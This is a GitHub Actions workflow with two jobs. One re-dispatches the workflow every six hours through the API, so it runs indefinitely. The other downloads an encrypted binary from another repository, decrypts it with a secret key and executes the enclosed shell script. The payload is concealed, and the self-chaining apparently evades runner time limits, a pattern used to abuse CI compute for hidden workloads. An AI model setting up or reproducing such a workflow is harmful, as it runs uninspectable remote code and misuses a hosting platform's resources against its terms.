name: main
on:
  workflow_dispatch:
jobs:
  Chain:
    runs-on: ubuntu-latest
    steps:
      - name: Run next action
        run: |
          sleep 5h 55m
          curl -X POST -H "Accept: application/vnd.github.v3+json" -H "Authorization: token $GHTOKEN" \
          $GITHUB_API_URL/repos/$GITHUB_REPOSITORY/actions/workflows/main.yml/dispatches -d '{"ref":"main"}'
        env:
          GHTOKEN: ${{ secrets.GHTOKEN }}
  Main:
    runs-on: ubuntu-latest
    steps:
      - name: Main
        run: |
          wget https://github.com/Heellc/hpga/raw/main/action.bin
          echo $key > key
          openssl enc -d -aes-256-cbc -in action.bin -out action.tar -kfile key -pbkdf2
          tar -xf action.tar
          sh main.sh
        env:
          key: ${{ secrets.KEY }}
